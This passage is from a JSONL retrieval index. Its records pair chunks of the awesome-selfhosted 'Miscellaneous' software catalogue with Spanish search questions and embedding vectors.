viewed content with metadata indexing and a user-friendly interface [⚠, GPL-3.0, Docker]. Tube β€” Youtube-like (_without censorship and features you don't need!_) video sharing app written in Go which also supports automatic transcoding to MP4 H.265 AAC, multiple collections and RSS feed [MIT, Go]. VideoLAN Client (VLC) β€” Cross-platform multimedia player client and server supporting most multimedia files as well as DVDs, Audio CDs, VCDs, and various streaming protocols [GPL-2.0, C/deb].", "indexar": "con que puedo montar un servidor de streaming de video eficiente sin descargar nada primero?", "v": [-0.01975, 0.10315, -0.27625, -0.13436, -0.07802, -0.03175, -0.03929, -0.02679, 5e-05, -0.09404, -0.03877, -0.05111, 0.02547, -0.11128, 0.03337, 0.11223, 0.13612, -0.09631, 0.08634, 0.04385, 0.06416, -0.04259, 0.04632, -0.12454, 0.00544, 0.06367, -0.00155, 0.00541, -0.14584, -0.07586, 0.00416, 0.05303, 0.02759, 0.02669, 0.01562, -0.08208, -0.02505, 0.09113, -0.05788, 0.04228, 0.016, 0.00854, -0.04281, 0.04704, 0.02819, -0.03758, 0.06735, -0.0506, 0.02502, 0.00635, 0.01306, -0.01147, -0.07546, -0.02748, -0.08273, -0.06601, 0.04753, -0.18359, 0.1053, -0.10569, -0.03966, 0.04826, -0.02752, -0.01606, 0.03293, 0.06532, -0.02426, 0.05604, -0.11742, -0.05075, -0.05588, 0.01904, -0.01172, -0.0343, -0.00072, 0.12002, -0.07118, -0.0213, 0.04091, 0.10541, 0.06425, -0.06345, -0.00491, 0.09159, -0.07479, -0.07858, -0.02326, -0.00892, 0.08551, -0.02116, 0.06491, 0.07467, -0.00647, 0.04463, 0.0136, -0.0752, 0.11731, 0.04127, 0.03082, -0.00235, -0.01448, 0.04744, -0.01393, 0.12495, 0.09645, 0.07075, 0.09957, -0.08777, 0.03815, -0.06224, 0.0456, -0.02872, -0.08911, 0.02257, -0.06017, -0.1126, -0.04865, -0.02115, -0.02426, 0.04676, -0.09494, -0.00087, 0.00965, -0.05346, 0.03124, -0.08993, 0.09296, 0.01941, -0.07182, 0.02708, -0.01814, -0.02557, -0.11139, -0.06797, 0.04034, -0.05723, 0.02091, -0.03228, -0.0722, -0.10731, 0.025, -0.00373, -0.05874, -0.02337, 0.08951, -0.04211, 0.10879, -0.10848, -0.07579, 0.02482, 0.04982, 0.03274, -0.06229, -0.076, -0.06082, -0.00944, 0.03501, -0.05741, 4e-05, 0.04531, 0.10121, 0.05781, 0.02153, 0.03822, -0.03207, -0.00518, -0.07169, 0.08477, 0.03744, 0.04136, -0.05547, 0.0177, -0.02928, -0.11822, -0.02281, -0.01598, -0.03541, -0.05802, 0.03613, -0.0043, -0.0582, 0.00846, -0.04575, 0.03573, -0.11157, -0.06013, -0.00679, 0.02172, -0.02561, 0.06176, 0.06517, 0.00325, -0.12022, 0.07367, 0.06552, -0.10716, -0.07829, -0.0548, -0.04062, -0.04693, -0.09223, -0.0865, -0.0377, -0.0184, 0.00181, -0.06105, 0.00172, 0.0472, -0.00196, 0.0284, -0.01667, 0.00102, 0.0565, -0.12429, -0.01143, -0.00611, 0.12089, -0.03671, -0.0595, 0.02186, -0.01166, 0.03469, 0.0652, -0.02313, 0.02181, 0.05935, 0.06513, 0.03825, 0.02342, 0.00311, -0.07668, 0.04565, -0.04514, -0.05381, 0.02675, 0.00964, 0.0328, -0.00689, -0.08623, -0.05256, 0.00414, 0.0517, 0.00823, -0.02104, -0.03723, -0.07378, -0.06488, 0.01462, 0.00541, -0.08208, 0.00701, -0.00367, 0.011, 0.02229, -0.0019, -0.0262]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: 2FAuth β€” Manage your Two-Factor Authentication (2FA) accounts and generate their security codes [AGPL-3.0, PHP/Docker]. Anchr β€” Toolbox for tiny tasks on the internet, including bookmark collections, URL shortening and (encrypted) image uploads [GPL-3.0, Nodejs]. Anubis β€” Web AI firewall utility which protects upstream resources from scraper bots [MIT, Docker/deb/Go]. asciinema β€” Web app for hosting asciicasts [Apache-2.0, Elixir/Docker]. Baby Buddy β€” Helps caregivers track baby sleep, feedings, diaper changes, and tummy time [BSD-2-Clause, Python]. ClipCascade β€” Syncs your clipboard across multiple devices instantly, without any button press. Available on Windows, macOS, Linux, and Android, it provides seamless and secure clipboard sharing with end-to-end data encryption [GPL-3.0, Java/Docker]. Cloudlog β€” Log your amateur radio contacts anywhere [MIT, PHP/Docker]. ConvertX β€” Online file converter which supports over a thousand different formats [AGPL-3.0, Docker].", "indexar": "que programa puedo usar para gestionar el autenticaciΓ³n de dos factores y generar sus cΓ³digos", "v": [0.04644, 0.02647, -0.09007, -0.14642, 0.07154, -0.05249, 0.05623, -0.00912, -0.14438, -0.09777, -0.10002, -0.04783, -0.03043, -0.03085, -0.0035, -0.02133, 0.15724, -0.1611, -0.03778, 0.0522, 0.04498, -0.09127, 0.04059, -0.14111, -0.04736, 0.05758, 0.08601, -0.07547, -0.01449, 0.04146, 0.0364, 0.02255, 0.11944, -0.13678, -0.05753, 0.07196, 0.02903, 0.11826, 0.02386, 0.08336, -0.01074, 0.07508, -0.08163, -0.00841, 0.10366, 0.03964, 0.01373, 0.01634, 0.03405, -0.0281, -0.03811, -0.05051, -0.06506, -0.02725, 0.02102, -0.08102, -0.00243, -0.13608, -0.08643, 0.00344, 0.00267, 0.0478, 0.01802, 0.01548, -0.02084, -0.03069, 0.17106, 0.01635, -0.0975, 0.07471, -0.08361, 0.02874, -0.05376, 0.02756, 0.11148, 0.0407, 0.01981, -0.04247, 0.0425, 0.04301, -0.03732, -0.00385, 0.01889, 0.02126, -0.04765, -0.0657, 0.07946, -0.08463, -0.04811, -0.12376, 0.00655, -0.08987, 0.05361, -0.05387, 0.03111, -0.0141, 0.05345, 0.06636, 0.06964, 0.04367, 0.07317, -0.10224, -0.03656, 0.13131, 0.03143, 0.11055, 0.10713, -0.07641, -0.00582, -0.00959, -0.1453, -0.10122, -0.1032, -0.0213, -0.07804, 0.01532, -0.00361, -0.07232, -0.0065, -0.09732, -0.09604, -0.04, -0.02839, 0.03365, 0.06341, 0.06215, 0.01175, 0.08687, -0.01469, 0.02691, -0.0433, -0.01683, -0.01056, -0.00366, -0.0702, -0.03388, -0.01537, -0.04421, 0.03823, 0.00755, -0.06197, 0.10658, 0.06852, 0.06024, 0.02993, -0.01939, -0.08585, -0.13838, -0.104, 0.05966, 0.02092, -0.02178, -0.03406, 0.04738, -0.12648, 0.01879, 0.0114, -0.03149, -0.0672, 0.00478, -0.12605, -0.01287, -0.07383, 0.02482, 0.08965, -0.03141, 0.03754, 0.04213, 0.04867, 0.09785, 0.0059, 0.06674, 0.10955, -0.07042, 0.05603, -0.03416, -0.02623, -0.12009, -0.04038, -0.03868, -0.07599, 0.03522, 0.08447, -0.02964, -0.04124, 0.03189, -0.02269, 0.08998, -0.0217, 0.00154, 0.04213, 0.07551, 0.00982, 0.04205, 0.00537, -0.00976, 0.03342, -0.00168, 0.04632, -0.06495, -0.05458, 0.04751, 0.04214, -0.04528, 0.09273, 0.10374, -0.07688, -0.00124, 0.07071, 0.06051, 0.02563, -0.07274, 0.04529, 0.00913, -0.09402, 0.00805, -0.05563, 0.05928, 0.04273, -0.01978, 0.01935, 0.00734, 0.02916, 0.02951, 0.00471, -0.06246, 0.02444, 0.03865, 0.03374, 0.02318, -0.03966, -0.01358, -0.03398, 0.04387, 0.05199, 0.01809, 0.03556, -0.0414, -0.033, -0.0901, 0.01419, 0.05841, 0.00914, -0.08405, -0.00928, 0.00767, -0.11054, 0.00792, -0.01417, -0.0042, -0.01036, 0.01206, 0.03013, 0.01204, 0.02488, -0.00189]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: 2FAuth β€” Manage your Two-Factor Authentication (2FA) accounts and generate their security codes [AGPL-3.0, PHP/Docker]. Anchr β€” Toolbox for tiny tasks on the internet, including bookmark collections, URL shortening and (encrypted) image uploads [GPL-3.0, Nodejs]. Anubis β€” Web AI firewall utility which protects upstream resources from scraper bots [MIT, Docker/deb/Go]. asciinema β€” Web app for hosting asciicasts [Apache-2.0, Elixir/Docker]. Baby Buddy β€” Helps caregivers track baby sleep, feedings, diaper changes, and tummy time [BSD-2-Clause, Python]. ClipCascade β€” Syncs your clipboard across multiple devices instantly, without any button press. Available on Windows, macOS, Linux, and Android, it provides seamless and secure clipboard sharing with end-to-end data encryption [GPL-3.0, Java/Docker]. Cloudlog β€” Log your amateur radio contacts anywhere [MIT, PHP/Docker]. ConvertX β€” Online file converter which supports over a thousand different formats [AGPL-3.0, Docker].", "indexar": "con quΓ© herramienta puedo subir imΓ‘genes al internet con cifrado y acortar enlaces de forma sencilla", "v": [0.0113, 0.10613, -0.17173, -0.07736, 0.01749, -0.1539, -0.0911, -0.08119, -0.09949, -0.10893, -0.02968, -0.14, -0.02935, -0.14235, 0.12215, -0.03613, 0.01547, -0.17579, 0.04705, -0.03745, 0.0954, 0.03717, -0.10329, -0.12686, -0.08089, -0.09818, 0.02433, 0.07527, -0.10584, 0.03776, -0.02501, 0.04579, 0.04058, 0.08397, -0.12644, -0.04041, 0.07554, 0.09703, 0.03466, -0.07775, -0.07226, 0.05132, -0.06337, -0.02874, -0.06534, 0.02681, -0.11021, -0.02922, 0.07645, 0.00781, 0.05406, -0.0825, -0.09133, -0.059, -0.15864, -0.12606, 0.22518, -0.08886, 0.02588, -0.06691, 0.00411, 0.09077, -0.04591, 0.05374, -0.01237, 0.05275, -0.03689, 0.00703, -0.06939, 0.02738, 0.04177, 0.10999, -0.0117, 0.01088, 0.0491, 0.03988, -0.04864, -0.03323, -0.06115, -0.02992, -0.04651, -0.0213, -0.01933, 0.01234, -0.13813, -0.03391, -0.04554, -0.02167, 0.01208, -0.1389, 0.05927, 0.09238, 0.05895, -0.03589, -0.05245, -0.02632, -0.03376, -0.0241, 0.01348, -0.02232, 0.04717, 0.06664, -0.11318, 0.08472, 0.00792, 0.02327, 0.0166, -0.05179, -0.11118, -0.03459, 0.09243, 0.01434, -0.02083, -0.08469, -0.07589, -0.00835, 0.0017, -0.05253, -0.02349, -0.11562, 0.07073, 0.0033, 0.00281, 0.01473, -0.02897, 0.04248, 0.02304, 0.07696, -0.04921, -0.12333, -0.0575, -0.01996, -0.03883, -0.10987, -0.01975, -0.00859, 0.01603, -0.12219, -0.00139, -0.08817, 0.03075, 0.02897, -0.10621, -0.1478, -0.01276, -0.00178, 0.03083, -0.04103, -0.12366, -0.00587, 0.00788, 0.04497, -0.00808, 0.01696, 0.03812, 0.03712, -0.07435, 0.00214, -0.04934, 0.00362, -0.04763, -0.04141, 0.09382, 0.05519, -0.0706, 0.04232, -0.05413, -0.02878, 0.02644, 0.00869, -0.04692, 0.01032, -0.03212, -0.06157, 0.04467, -0.0507, -0.08512, -0.01855, -0.04608, -0.03961, -0.03094, 0.00378, -0.01977, 0.03647, -0.00095, -0.03676, 0.02959, -0.03388, -0.05266, 0.01205, -0.02935, 0.00149, -0.05229, 0.02968, 0.1099, -0.00701, -0.04853, 0.02238, 0.07586, 0.0048, -0.07261, -0.09325, 0.01625, -0.02555, -0.04147, 0.02159, -0.01839, -0.01333, -0.02666, 0.03412, -0.00133, -0.03997, 0.03737, -0.11176, -0.01511, -0.01681, 0.03626, -0.03578, -0.05104, 0.01527, 0.00488, 0.05154, 0.03649, 0.02734, 0.03926, 0.08128, -0.01999, 0.02163, -0.01383, -0.00074, -0.00388, -0.04137, 0.00868, -0.04958, -0.00724, -0.06382, -0.00319, -0.00498, -0.0934, 0.02288, -0.02202, 0.04126, 0.0248, 0.01375, -0.03008, -0.04218, -0.04537, -0.02935, 0.02709, -0.06754, -0.03069, 0.01952, 0.0376, -0.0109, -0.01463, -0.02058]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: 2FAuth β€” Manage your Two-Factor Authentication (2FA) accounts and generate their security codes [AGPL-3.0, PHP/Docker]. Anchr β€” Toolbox for tiny tasks on the internet, including bookmark collections, URL shortening and (encrypted) image uploads [GPL-3.0, Nodejs]. Anubis β€” Web AI firewall utility which protects upstream resources from scraper bots [MIT, Docker/deb/Go]. asciinema β€” Web app for hosting asciicasts [Apache-2.0, Elixir/Docker]. Baby Buddy β€” Helps caregivers track baby sleep, feedings, diaper changes, and tummy time [BSD-2-Clause, Python]. ClipCascade β€” Syncs your clipboard across multiple devices instantly, without any button press. Available on Windows, macOS, Linux, and Android, it provides seamless and secure clipboard sharing with end-to-end data encryption [GPL-3.0, Java/Docker]. Cloudlog β€” Log your amateur radio contacts anywhere [MIT, PHP/Docker]. ConvertX β€” Online file converter which supports over a thousand different formats [AGPL-3.0, Docker].", "indexar": "existe alguna alternativa libre a los gestores de portapapeles que sincronice mis dispositivos sin necesidad de pulsar botones", "v": [0.06518, -0.04013, -0.24899, -0.10327, -0.06218, -0.00175, 0.11643, -0.16174, -0.20895, -0.17734, -0.04357, 0.00493, 0.01323, 0.07926, 0.1023, -0.1249, -0.06762, -0.0154, 0.07846, -0.03128, -0.14523, -0.02984, -0.03236, -0.02928, -0.04219, 0.02387, 0.04251, -0.04835, -0.13751, -0.00966, -0.08213, -0.1102, 0.06433, -0.06493, -0.08863, -0.10027, -0.08089, -0.01576, 0.06644, 0.00809, -0.02693, 0.09719, -0.04975, 0.10539, -0.05146, -0.04601, -0.00346, -0.02514, 0.08789, 0.13456, -0.11728, 0.00543, -0.1287, 0.02754, 0.02614, -0.06451, 0.19969, -0.04719, 0.01089, -0.08906, -0.07885, 0.07193, 0.01444, -0.04476, 0.0061, 0.05144, 0.03028, -0.09536, -0.0591, 0.0792, 0.0155, 0.02944, 0.04246, 0.06966, -0.04599, 0.04282, -0.04725, 0.00308, 0.02352, 0.08437, 0.15195, 0.00089, -0.05653, -0.00389, -0.02983, -0.0426, 0.11253, 0.01399, -0.01865, -0.06788, 0.04788, 0.02818, 0.04855, 0.08007, -0.0264, -0.02739, -0.0941, 0.08129, -0.00953, 0.10588, 0.07023, 0.09835, -0.03712, -0.01729, 0.00842, 0.07365, 0.01103, -0.06349, 0.13065, -0.03391, 0.0148, 0.01818, -0.0221, -0.02333, -0.04659, 0.04271, 0.01606, -0.00838, -0.05329, -0.03294, -0.06762, -0.13324, 0.05607, -0.12102, 0.03994, 0.04661, 0.00477, 0.02226, 0.0425, 0.04612, 0.13861, -0.09355, 0.03211, -0.0905, -0.10879, 0.01353, -0.03271, 0.01115, 0.0584, -0.02343, -0.01377, 0.0679, 0.00385, -0.0183, 0.02363, -0.04109, -0.00231, 0.01499, -0.02181, -0.0475, -0.08661, -0.07017, -0.02109, 0.08096, -0.01809, 0.06371, -0.06439, 0.03197, -0.06447, 0.08198, -0.01269, -0.05325, -0.01643, -0.00161, -0.05596, -0.02786, 0.0426, 0.00779, -0.06093, 0.03184, -0.01295, 0.06751, 0.07533, 0.00325, 0.01025, -0.04852, -0.00049, -0.03211, 0.05927, -0.04747, 0.05152, 0.05946, -0.03347, -0.00558, 0.01953, -0.06425, -0.05734, 0.04649, 0.012, 0.03334, 0.0732, -0.01672, -0.02306, -0.02288, 0.02144, -0.01343, 0.03957, -0.0447, 0.02697, 0.01876, 0.00676, -0.0406, 0.04664, -0.03304, 0.03078, 0.07057, -0.03447, 0.0381, 0.06936, 0.04657, 0.03256, -0.00098, 0.01628, 0.0791, -0.02447, -0.04781, -0.001, 0.05891, -0.0019, -0.05917, 0.05823, -0.02221, 0.04436, 0.04854, 0.02844, 0.08946, -0.01551, 0.03629, -0.02668, -0.02836, 0.01168, -0.01747, 0.02429, 0.06636, 0.00423, -0.00138, -0.02231, -0.01006, 0.02037, -0.00133, -0.0297, 0.03512, 0.06557, 0.00547, -0.06759, -0.00645, -0.07554, -0.0716, -0.02451, -0.00688, 0.01111, 0.02445, 0.01062, 0.02851, 0.05099, 0.05256]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: CUPS β€” The Common Unix Print System uses Internet Printing Protocol (IPP) to support printing to local and network printers [GPL-2.0, C]. CyberChef β€” Perform all manner of operations within a web browser such as AES, DES and Blowfish encryption and decryption, creating hexdumps, calculating hashes, and much more [Apache-2.0, Javascript]. Digiboard β€” Create collaborative whiteboards (documentation in French) [AGPL-3.0, Nodejs]. Digicard β€” Create simple graphic compositions (documentation in French) [AGPL-3.0, Nodejs]. Digicut β€” Cut audio and video files using FFMPEG.wasm (documentation in French) [AGPL-3.0, Nodejs]. Digiface β€” Create avatars using the Avataaars library (documentation in French) [AGPL-3.0, Nodejs]. Digiflashcards β€” An online application to create flashcards (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digimerge β€” Assemble audio and video files directly in your browser (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "quΓ© programa puedo usar para editar y unir archivos de video directamente en el navegador?", "v": [0.01166, -0.03809, -0.13147, -0.14601, -0.01125, -0.07333, 0.0311, -0.04352, 0.00974, -0.20191, -0.07489, -0.19599, -0.05298, -0.06172, -0.11569, 0.01932, 0.14745, -0.0694, 0.13101, -0.01546, 0.0289, 0.0272, -0.00319, -0.02536, -0.04849, 0.04582, -0.03177, 0.03416, -0.04826, -0.11707, -0.10815, 0.05167, 0.08466, -0.04886, -0.06855, 0.02051, 0.13991, 0.08186, -0.02377, 0.08754, -0.01004, 0.01761, -0.09201, 0.05638, -0.00718, 0.00635, 0.10368, -0.06644, -0.03099, -0.07519, 0.02965, 0.04162, -0.09447, 0.09436, -0.0391, -0.04988, -0.00857, -0.21419, -0.02525, -0.012, 0.03548, 0.02136, -0.01195, 0.05887, -0.10077, -0.00576, 0.00125, 0.02205, -0.09617, 0.09029, -0.02545, 0.03891, 0.0795, 0.06153, -0.07592, 0.0951, -0.04534, -0.03239, 0.02256, -0.00087, 0.03957, 0.00658, 0.03285, 0.04498, -0.09009, -0.04507, 0.04509, 0.00223, -0.02453, -0.12974, 0.03452, 0.09669, 0.00932, -0.05878, 0.05751, -0.12196, 0.10115, -0.00028, 0.02396, -0.06127, 0.01567, -0.0794, -0.04263, 0.17143, 0.06788, 0.06515, 0.10438, -0.01891, -0.09248, 0.02384, 0.11336, 0.02416, -0.07732, -0.03873, -0.08798, 0.08648, -0.04676, -0.05685, -0.04071, -0.15639, -0.07586, 0.03703, -0.08446, -0.0422, 0.08955, 0.0347, 0.01676, 0.10646, -0.14879, 0.10529, 0.03569, -0.04845, -0.07865, -0.04242, -0.03823, -0.03334, 0.03756, 0.0162, -0.00716, -0.00213, 0.11419, -0.00177, -0.01995, 0.04744, 0.0898, -0.03883, -0.01785, -0.05618, -0.07241, -0.08385, 0.06498, -0.06278, -0.0358, -0.08059, -0.0298, 0.02814, 0.00832, -0.05362, -0.04921, 0.02949, -0.0591, 0.03689, -0.05144, -0.0142, 0.01501, -0.06616, -0.0281, 0.03788, 0.02445, 0.05658, 0.10111, 0.07668, 0.04, -0.09243, -0.00229, 0.03234, -0.00512, -0.00404, -0.00552, -0.03321, -0.03039, -0.01923, 0.03117, 0.05632, -0.04239, -0.04769, 0.04899, 0.05518, -0.08432, 0.07697, -0.05794, 0.04515, -0.0006, 0.01248, 0.01026, -0.01986, -0.06395, -0.00887, -0.01933, -0.01576, -0.01771, -0.0517, 0.00616, 0.02504, 0.03611, 0.02993, -0.026, -0.03193, 0.09215, 0.04741, -0.03875, -0.03996, 0.06525, 0.00692, 0.04371, 0.00116, 0.03708, 0.09442, 0.01068, 0.01565, 0.03396, -0.01258, 0.01693, -0.00382, 0.04759, 0.02584, 0.03869, 0.00075, -0.07993, -0.01002, -0.04476, -0.03169, -0.07644, -0.03508, 0.02707, 0.00107, 0.00902, 0.01841, -0.04126, -0.02343, -0.03561, 0.10086, 0.00062, -0.0066, -0.05807, -0.01903, -0.06706, 0.02067, 0.00679, -0.02805, -0.02075, 0.04633, 0.00104, -0.02743, -0.00966, 0.06004]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: CUPS β€” The Common Unix Print System uses Internet Printing Protocol (IPP) to support printing to local and network printers [GPL-2.0, C]. CyberChef β€” Perform all manner of operations within a web browser such as AES, DES and Blowfish encryption and decryption, creating hexdumps, calculating hashes, and much more [Apache-2.0, Javascript]. Digiboard β€” Create collaborative whiteboards (documentation in French) [AGPL-3.0, Nodejs]. Digicard β€” Create simple graphic compositions (documentation in French) [AGPL-3.0, Nodejs]. Digicut β€” Cut audio and video files using FFMPEG.wasm (documentation in French) [AGPL-3.0, Nodejs]. Digiface β€” Create avatars using the Avataaars library (documentation in French) [AGPL-3.0, Nodejs]. Digiflashcards β€” An online application to create flashcards (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digimerge β€” Assemble audio and video files directly in your browser (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "con quΓ© herramienta puedo realizar operaciones como cifrar textos o calcular hashes sin instalar nada?", "v": [0.02094, 0.07893, -0.21547, -0.11085, 0.09773, -0.16623, -0.02962, -0.02148, -0.14984, -0.01188, -0.09827, -0.06282, 0.06949, -0.08569, 0.16721, 0.04147, 0.08072, -0.16691, -0.02819, -0.00613, 0.00212, -0.07953, -0.11377, -0.0308, -0.12709, -0.05533, -0.04144, 0.00231, -0.24277, -0.02195, -0.01185, 0.04075, 0.11203, -0.05814, -0.06628, 0.1296, -0.07818, -0.00827, 0.0374, 0.01801, -0.03869, 0.14217, -0.03504, 0.08681, 0.04953, -0.06689, -0.04041, 0.07261, 0.02904, -0.08173, 0.11744, -0.06065, -0.14186, -0.03735, -0.07223, -0.14144, 0.2269, -0.02579, 0.00637, -0.12723, 0.0106, 0.14325, -0.06135, 0.00822, 0.04499, -0.01792, 0.01176, -0.00362, -0.01523, 0.09303, -0.04322, 0.15387, -0.11175, 0.08174, 0.03473, -0.01464, -0.02294, -0.05136, 0.0588, -0.03976, -0.01388, -0.10501, -0.05042, -0.00474, -0.01224, -0.06725, 0.00285, -0.00176, 0.0887, -0.01934, -0.02921, -0.04107, -0.0213, 0.01792, -0.0467, -0.00429, 0.13003, 0.00206, -0.06429, 0.00161, 0.07497, -0.02853, -0.07598, 0.06491, -0.01776, 0.04126, -0.03861, -0.01499, -0.02993, -0.05459, 0.09667, -0.02938, -0.02879, -0.05661, -0.06265, 0.02049, 0.00797, -0.01521, -0.04411, -0.00774, -0.03413, 0.04639, -0.00101, 0.02397, 0.03972, -0.07627, 0.00525, 0.0907, 0.01786, -0.02498, -0.02632, -0.04224, 0.00619, -0.03216, -0.00214, -0.03532, 0.00176, -0.12271, 0.01432, -0.04717, 0.03393, 0.05589, -0.0738, -0.10241, 0.06778, 0.04035, 0.01676, 0.00525, -0.01745, -0.06752, 0.09176, -0.01166, -0.01597, 0.13566, -0.04802, -0.00141, 0.02908, -0.01908, -0.08468, 0.02052, -0.03451, -0.02224, 0.02767, -0.00979, 0.00663, -0.02557, -0.02631, -0.0176, 0.09107, 0.03759, -0.01476, 0.01264, 0.05418, -0.05564, 0.05983, -0.02982, -0.04823, 0.01638, 0.01381, -0.07303, -0.02353, -0.00496, -0.02689, -0.0366, 0.0481, 0.01148, 0.04524, -0.0262, -0.01531, 0.05637, 0.02574, 0.03948, -0.0622, -0.06183, 0.0114, 0.01739, -0.02616, -0.02809, 0.04732, -0.06266, -0.02586, 0.0093, 0.01063, -0.00992, 0.06518, 0.04634, -0.08636, 0.02745, 0.00954, 0.05197, 0.0441, -0.02001, -0.03893, -0.03686, -0.0076, -0.0186, -0.00084, -0.00835, -0.00546, 0.03032, -0.00974, 0.02966, 0.01513, -0.05093, -0.03096, 0.00963, 0.04903, 0.08708, 0.03683, 0.06288, -0.02564, -0.03789, 0.02384, 0.04223, 0.01252, -0.04482, 0.01598, -0.0136, -0.07612, 0.01623, 0.03481, 0.04077, 0.07145, -0.0343, -0.03971, 0.02951, -0.02041, 0.01758, -0.04559, -0.05341, -0.03991, 0.05489, 0.07874, -0.00582, 0.02315, -0.02972]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: CUPS β€” The Common Unix Print System uses Internet Printing Protocol (IPP) to support printing to local and network printers [GPL-2.0, C]. CyberChef β€” Perform all manner of operations within a web browser such as AES, DES and Blowfish encryption and decryption, creating hexdumps, calculating hashes, and much more [Apache-2.0, Javascript]. Digiboard β€” Create collaborative whiteboards (documentation in French) [AGPL-3.0, Nodejs]. Digicard β€” Create simple graphic compositions (documentation in French) [AGPL-3.0, Nodejs]. Digicut β€” Cut audio and video files using FFMPEG.wasm (documentation in French) [AGPL-3.0, Nodejs]. Digiface β€” Create avatars using the Avataaars library (documentation in French) [AGPL-3.0, Nodejs]. Digiflashcards β€” An online application to create flashcards (documentation in French) [AGPL-3.0, Nodejs/PHP]. Digimerge β€” Assemble audio and video files directly in your browser (documentation in French) [AGPL-3.0, Nodejs].", "indexar": "busco una alternativa gratuita a Photoshop para hacer composiciones grΓ‘ficas simples", "v": [0.25587, -0.00534, -0.15477, -0.08307, -0.06593, -0.13394, 0.10901, -0.03045, -0.0873, -0.05046, 0.05742, 0.00804, -0.10343, 0.0129, 0.08445, -0.14808, 0.0111, -0.04513, 0.03924, 0.02983, -0.04449, 0.01208, -0.14039, -0.03984, 0.03438, -0.06442, -0.04072, -0.07969, -0.10836, 0.07584, 0.02804, -0.00293, 0.00885, -0.04717, -0.15232, -0.06209, 0.11439, -0.06222, 0.01243, -0.0484, 0.02114, 0.01351, -0.02083, 0.10127, -0.15887, -0.09539, -0.0535, 0.01308, -0.09191, -0.00319, 0.10864, -0.0349, -0.01488, 0.06445, -0.02141, -0.13929, 0.17689, -0.17179, -0.13891, 0.00341, 0.11592, 0.13536, 0.02649, 0.08754, 0.09379, 0.07677, 0.00725, -0.07959, 0.01727, 0.07922, 0.0741, 0.11883, 0.0847, -0.07039, 0.0554, 0.02525, -0.07319, -0.09782, -0.04158, 0.02894, -0.00097, -0.02973, -0.06051, 0.00973, -0.12691, -0.05079, 0.03279, -0.03723, -0.03702, -0.00287, 0.00982, -0.02367, 0.0316, 0.11188, 0.0099, -0.03635, -0.00328, -0.00798, 0.06461, 0.08401, 0.07731, -0.08456, -0.12165, -0.0458, -0.0395, -0.03661, 0.03829, 0.09352, -0.14029, 0.03664, -0.03371, 0.04312, 0.07371, 0.03436, 0.04527, -0.02522, 0.10507, -0.00507, 0.00231, 0.01625, 0.00083, 0.04907, -0.07264, -0.0442, 0.07486, 0.08033, -0.0054, 0.07657, -0.08577, 0.03553, -0.04508, -0.06138, -0.04354, -0.06715, -0.02417, -0.01049, 0.04279, -0.08356, 0.01434, -0.04461, -0.01008, 0.03319, 0.02363, -0.12097, -0.01106, 0.04876, 0.00881, -0.05371, 0.00871, -0.0377, -0.02474, 0.01918, -0.07187, 0.07842, 0.03805, 0.09044, -0.00222, -0.08276, -0.01195, -0.03456, -0.03189, 0.03418, -0.01573, 0.04298, -0.04941, 0.01853, -0.0331, -0.0339, -0.04364, 0.02717, -0.02799, 0.03642, -0.01439, -0.06791, 0.00336, -0.00222, -0.02979, -0.05648, -0.03161, -0.02522, 0.0567, -0.03163, -0.01132, -0.00086, -0.00239, 0.04824, -0.00127, 0.04155, -0.01503, -0.04943, -0.05443, 0.01067, -0.06684, 0.03383, 0.05644, 0.01751, -0.02738, -0.02673, -0.10797, 0.04077, -0.00795, -0.07929, -0.02487, -0.02853, 0.03863, 0.04475, -0.03016, 0.08764, 0.01971, 0.00067, -0.05722, 0.08017, -0.05214, -0.04659, 0.00867, 0.02243, 0.02029, -0.05242, -0.0025, -0.01554, 0.01392, 0.03295, 0.04443, 0.06716, 0.02669, 0.01851, 9e-05, 0.04203, -0.00316, 0.05583, 0.02351, 0.04882, -0.00525, 0.01841, 0.02797, -0.02117, -0.06246, -0.01738, 0.02331, -0.00488, 0.1163, 0.00698, 0.01323, 0.0846, -0.03242, -0.03422, -0.00961, -0.02822, 0.03325, -0.00738, -0.00036, 0.05165, 0.01093, 0.0508, -8e-05, -0.03049]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Miscellaneous: Digiquiz β€” An online application to publish content created with H5P (documentation in French) [AGPL-3.0, Nodejs]. Digiread β€” Clean up online pages and articles using Mozilla's Readability (documentation in French) [⚠, AGPL-3.0, Nodejs/PHP]. Digisteps β€” A simple application for creating online educational paths (documentation in French) [AGPL-3.0, Nodejs/PHP]. 